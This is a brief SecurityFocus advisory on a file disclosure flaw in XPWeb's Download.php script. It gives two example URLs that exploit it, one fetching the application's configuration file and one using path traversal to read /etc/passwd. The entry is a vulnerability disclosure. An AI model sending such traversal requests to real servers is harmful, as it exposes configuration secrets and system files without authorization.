XPWeb 'Download.php' File Disclosure Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/Download.php?url=Config.inc.php http://www.example.com/Download.php?url=../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus